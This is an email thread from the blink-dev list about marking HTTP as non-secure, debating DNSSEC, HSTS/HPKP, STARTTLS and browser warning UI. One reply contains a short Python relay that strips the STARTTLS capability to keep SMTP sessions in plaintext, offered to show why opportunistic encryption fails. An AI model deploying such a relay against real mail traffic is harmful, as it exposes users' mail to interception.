Re: [blink-dev] Re: Proposal: Marking HTTP As Non-Secure

On Dec 27, 2014 1:08 AM, "Austin William Wright" <aaa@bzfx.net> wrote:
>
>
>
> On Fri, Dec 26, 2014 at 11:36 PM, Ryan Sleevi <rsleevi@chromium.org> wrote:
>
> (snip)
>
>> >>
>> >> That is, the standard could have provided policy and the site could
>> >> have sent a policy that governed the pinset. The site could have
>> >> allowed an override or denied an override. But it was decided all
>> >> users must be subjected to the interception, so the policy elements
>> >> were not provided.
>> >>
>> >> So how's that for strategy: the user does not get a choice in their
>> >> secure connection and the site does not get a choice in its secure
>> >> connection. Rather, some unrelated externality makes the choice.
>> >
>> >
>> > I share your concerns, and more: Public Key Pinning (and Strict
>> > Transport Security, for that matter) is awfully specific to HTTP, even
>> > though it has nothing to do with HTTP at all. The proper place to put
>> > this information is in DNS records. This has worked reasonably well for
>> > email; or at least I don't see anyone proposing we query SMTP servers
>> > for relevant security metadata.
>>
>> I assume that you aren't familiar with STARTTLS? The encryption and
>> security story for email is disastrously worse than anything for HTTP.
>>
>> > So why do this for HTTP? (If one wants to answer that properly
>> > stopping forged headers is less important than stopping plaintext cat
>> > pictures, color me surprised; if it's because it's a better alternative
>> > than unencrypted DNS records for those lacking DNSSEC, that's a better
>> > answer, but it still relegates HPKP and HSTS to the realm of "stopgap
>> > measure".)
>> >
>> > Austin.
>>
>> Indeed. From the point of view of client applications, DNSSEC is a
>> complete and utter failure, and will remain so for the next decade, given
>> hardware cycles. If a decade sounds like a stopgap measure, even though
>> that is longer than the relevant lifetime of sites like Myspace, so be
>> it; that still seems like a pretty good run to me.
>
>
> I would challenge this notion: the deployment cycle doesn't seem to be
> that much longer than that of TLS (underneath HTTP). SSL was first
> available in 1995 and standardized in 1996, almost twenty years ago. TLS
> 1.0 came out in 1999, and we STILL have user-agents that will happily
> downgrade to SSL 3.0. (I don't claim to be a TLS/DNSSEC historian; feel
> free to correct me.)

I suspect we are diverging far from the topic at hand, so I won't respond
in depth.

>
> While efforts to secure DNS began around the same time, the modern DNSSEC
> was first operational around 2004, and the first root Key Signing Ceremony
> was held only in 2010! I find it fully usable in those applications that
> support it. At the application-client level, I haven't found any reason
> not to support it.
>

There are a tremendous number of issues. Frankly, old hardware (e.g.
systems running Windows XP, old home routers, old core routers) needs to go
away: it either lacks DNSSEC support at any sensible level or actively
blocks it.

Again, this isn't an opinion: support for DNSSEC in client networks and on
client software is awful. Not a "fix Chrome" awful, but "fix the Internet,
the software stack, the OS" awful.

Beyond all of the operational security issues (which EXCEED those of CAs in
many ways), the reality is that DNSSEC is IPv6 in a pre-RFC 3542 world.
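
To make the client-side picture concrete, here is a minimal sketch of what
a stub client can actually learn - assuming the Python dnspython package;
the resolver address and query name are placeholders:

    import dns.flags
    import dns.message
    import dns.query
    import dns.rdatatype

    # Sketch only: set the DNSSEC-OK (DO) bit and inspect the Authenticated
    # Data (AD) flag in the reply. Two of the client-side problems above
    # show up immediately: the AD bit is just an assertion by the upstream
    # resolver, so a stub must trust an unauthenticated last hop, and
    # middleboxes that mangle EDNS0 or drop large UDP responses make the
    # query fail outright.
    query = dns.message.make_query("example.com", dns.rdatatype.A,
                                   want_dnssec=True)
    response = dns.query.udp(query, "8.8.8.8", timeout=5)  # placeholder resolver
    if response.flags & dns.flags.AD:
        print("resolver *claims* the answer validated")
    else:
        print("no DNSSEC validation on this path")

Unless the stub does full validation itself (chasing RRSIG/DNSKEY/DS up to
the root), that AD bit is the whole security story, which is why "fix the
software stack" is not hyperbole.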

> I would venture to guess that Web browsers and other user-agents could
> have a greater impact by deploying DNSSEC support than by forcing TLS
> usage. The former adds more options for security; the latter imposes costs
> on users of TLS, whether or not the existing system suits their needs.

Nope. Wrong wager.

>
> I don't see anything wrong with STARTTLS; in fact, I find it preferable
> to having separate URI schemes for what is otherwise the same resource. (I
> don't actually run any email servers, but I use STARTTLS with LDAP, XMPP,
> a proprietary protocol, and the similar RFC 2817 for HTTP. That is, in
> fact, a thing.) If one requires security, one can always start requests
> with "STARTTLS"; if a server demands security (for its definition of
> security), then it can just kill plaintext queries.

Again, as with HTTP, an attacker can easily strip out the STARTTLS
capability, and many already do. The server cannot meaningfully reject
plaintext queries - the attacker need only SSLStrip them, speaking TLS to
the server while keeping the client in plaintext.

In short, it provides zero effective security without supplemental
out-of-band policy.
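
To illustrate how little effort is involved: below is a rough sketch
(hostnames and ports are hypothetical) of an on-path relay that performs
the downgrade. It illustrates the failure mode; it is not a tool:

    import socket
    import threading

    # Relay bytes between client and server, deleting the STARTTLS
    # capability from the server's EHLO response so the session stays in
    # plaintext. (A real attacker would also handle the "250 STARTTLS"
    # final-line form and swallow the client's STARTTLS command.)
    UPSTREAM = ("mail.example.net", 25)  # hypothetical server

    def pipe(src, dst, strip):
        while True:
            data = src.recv(4096)
            if not data:
                break
            if strip:
                data = data.replace(b"250-STARTTLS\r\n", b"")
            dst.sendall(data)

    listener = socket.socket()
    listener.bind(("0.0.0.0", 2525))
    listener.listen(1)
    client, _ = listener.accept()
    server = socket.create_connection(UPSTREAM)
    threading.Thread(target=pipe, args=(client, server, False),
                     daemon=True).start()
    pipe(server, client, True)  # strip in the server-to-client direction

The countermeasure has to be something the attacker cannot rewrite in-band:
a pre-arranged "always require TLS" rule, which is exactly the role HSTS
plays for HTTP.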

> Nor do I find deployment of TLS on email systems to be particularly
> behind TLS on HTTP (do you have data on this?).

Multiple organizations, including Google, provide scorecards on TLS support.

There is no question that email is behind HTTP.

But more importantly, and to the point to which I was originally responding:
1) SMTP/IMAP do not use DNS to deliver security policy.
2) DNSSEC is a presently-failed technology. That it might improve is a
possibility, but not with today's Internet.
3) DNSSEC is less secure than the CA system, for many reasons.
4) Most importantly, the lack of a scheme and the opportunistic encryption
employed by SMTP make it no different from HTTP - an active attacker can
break confidentiality, integrity, or authenticity with near-zero effort,
and in a way that people would be surprised to realize.

People assume that emails are like letters in envelopes, when in reality
they are postcards. Holding email up as a model for HTTP would be one of
the few ways to make HTTP worse.
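
For contrast, here is what non-opportunistic client behavior looks like - a
minimal sketch using Python's standard smtplib, with a placeholder host:

    import smtplib
    import ssl

    # Refuse to proceed unless STARTTLS is both offered and completes with
    # certificate verification. Without an out-of-band rule like this, a
    # missing STARTTLS capability is indistinguishable from a stripped one,
    # and opportunistic clients simply fall back to plaintext.
    conn = smtplib.SMTP("mail.example.net", 587)  # placeholder host
    conn.ehlo()
    if not conn.has_extn("starttls"):
        conn.quit()
        raise RuntimeError("no STARTTLS offered; refusing to send in plaintext")
    conn.starttls(context=ssl.create_default_context())  # verifies the cert
    conn.ehlo()  # re-issue EHLO over the encrypted channel

The policy lives in the client, not in anything the network can rewrite;
that is the difference between opportunistic and required encryption.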

> In particular, I do like Alex Russell's assertion that TLS is about
> "quality of service" (if I understand correctly; my point in response
> being that this is not exclusively what security entails), and this is
> something that exists below the application layer.
>
> Austin.
>
>>
>> >
>> >>
>> >>
>> >> Jeff
>> >>
>> >> On Fri, Dec 26, 2014 at 8:33 PM, Austin William Wright <aaa@bzfx.net> wrote:
>> >> >
>> >> > On Wed, Dec 24, 2014 at 3:43 PM, Alex Russell <slightlyoff@google.com> wrote:
>> >> >> ...
>> >> >>
>> >> >> No, the request for a resource means something. Security is about
>> >> >> the quality of service in delivering said thing.
>> >> >
>> >> > Specifically, I refer to privacy and authentication (which seems to
>> >> > be what "security" means here). There are many components to
>> >> > security, and they're not all going to be desired at the same level
>> >> > for every request; sometimes they are even at odds with each other.
>> >> > Deniability is a particularly expensive one to implement, often at
>> >> > significant monetary and performance cost to the user. Deniability
>> >> > is simply not implemented by any website (or more accurately, any
>> >> > authority) indexed by the major search engines.
>> >> >
>> >> > It's difficult to claim, though, that deniability is about "quality
>> >> > of service", but it is nonetheless considered something _very_
>> >> > important by Tor, and by users of it.
>> >> >
>> >> >>
>> >> >> > HTTP could mean, simply, "I don't care about security".
>> >> >>
>> >> >> Then user agents should be free to act on behalf of users to write
>> >> >> off correspondents who do not value the user enough to protect the
>> >> >> message in transit.
>> >> >>
>> >> >> You're making claims about what UAs must do from the perspective
>> >> >> of servers; this is a clear misunderstanding of the agency problem.
>> >> >>
>> >> >> We're the user's agent, not the publisher's.
>> >> >
>> >> > When a user navigates to an https:// resource, or hits the checkbox
>> >> > for STARTTLS, or selects "Require encryption" from a drop-down,
>> >> > they, the user, are *demanding* a secure connection (for someone's
>> >> > definition of secure; traditionally this means privacy and
>> >> > authentication but need not include deniability).
>> >> >
>> >> > If we want to talk about the perspective of servers, the server has
>> >> > options to demand a secure connection too; it simply has to deny
>> >> > plaintext requests (it could redirect, but this risks the user-agent
>> >> > sending sensitive information, including the request-URI, that'll
>> >> > just be ignored), and TLS can specifically ask for or require a
>> >> > client TLS certificate for authentication.
>> >> >
>> >> > The user-agent works for the user, not the other way around.
>> >> > Letting a user-agent intervene in the case of a plaintext request
>> >> > imposes a value on the user: it prioritizes privacy over "DO NOT
>> >> > BREAK USERSPACE!", which is not *necessarily* the user's own
>> >> > ordering.
>> >> >
>> >> > If TLS were free or very cheap to implement, however, this would be
>> >> > a non-issue. Hence my treatment of ways to do this.
>> >> >
>> >> > Even if the http-as-non-secure proposal fully worked, it would
>> >> > still increase the cost of publishing content and the barriers to
>> >> > entry. I recall Tim Berners-Lee recollecting that requiring users to
>> >> > mint a long-lived URI was a concerning cost, but there was no other
>> >> > way to design a decentralized Web. (In the end, the biggest barrier
>> >> > to entry has been acquisition of a domain name and hosting.)
>> >> >
>> >> > Of course, if efficiency and security are at odds, then we prefer
>> >> > security. However, I see making TLS implementation cheaper as a
>> >> > viable alternative to this proposal, and one that is far more
>> >> > appealing.
>> >> >>
>> >> >> > A TLS failure means "Security is _required_ by the other party,
>> >> >> > but couldn't be set up and verified. Abort! Abort!"
>> >> >> >
>> >> >> > Purporting that plaintext and HTTPS failure are the same would
>> >> >> > be conditioning users to be less worried about HTTPS failures,
>> >> >> > where there's a known _requirement_ for confidentiality.
>> >> >>
>> >> >> The UA could develop different (but also scary) UI for these
>> >> >> conditions.
>> >> >
>> >> > I am specifically referring to the part of the proposal that, in
>> >> > the long term, specifies no UI difference between plaintext and
>> >> > failed TLS.
>> >> >
>> >> > Would you care to make an alternate proposal with this change?
>> >> >>
>> >> >> Regardless, we have done a poor job communicating the effective
>> >> >> system model (that content is not tamper-evident when served over
>> >> >> HTTP). Steps to make this clearer aren't the same thing as throwing
>> >> >> all distinction overboard.
>> >> >>
>> >> >> > There may be some value in saying "as with many network
>> >> >> > requests, request/submission is being sent in the clear. Anyone
>> >> >> > on your network will be able to read this!". But big scary
>> >> >> > warnings are most certainly bad. No matter what, before I claim
>> >> >> > anything for sure, I would like to see a double-blind study, and
>> >> >> > not change for the sake of change.
>> >> >>
>> >> >> This sort of argument might have worked in '12. Apologies, but
>> >> >> you're dreadfully late.
>> >> >
>> >> > I'm afraid snark wasn't my first language, so you'll have to
>> >> > refresh my memory: what are you referring to?
>> >> >
>> >> > Earlier in my message, I touched on the danger of users dismissing
>> >> > warnings for, e.g., their bank, because users become dismissive of
>> >> > "insecure connection" warnings found elsewhere.
>> >> >
>> >> > Now, we might have HSTS (for my bank example), but at that point
>> >> > we're no longer talking about two tiers of security, but three
>> >> > (insecure-bypassable, insecure-nonbypassable, secure), which is
>> >> > precisely what the proposal is advocating moving _away_ from (or,
>> >> > the proposal is not very clear on this point, and a clarification in
>> >> > its text would be necessary).
>> >> >> ...
>> >
>> >
>
>
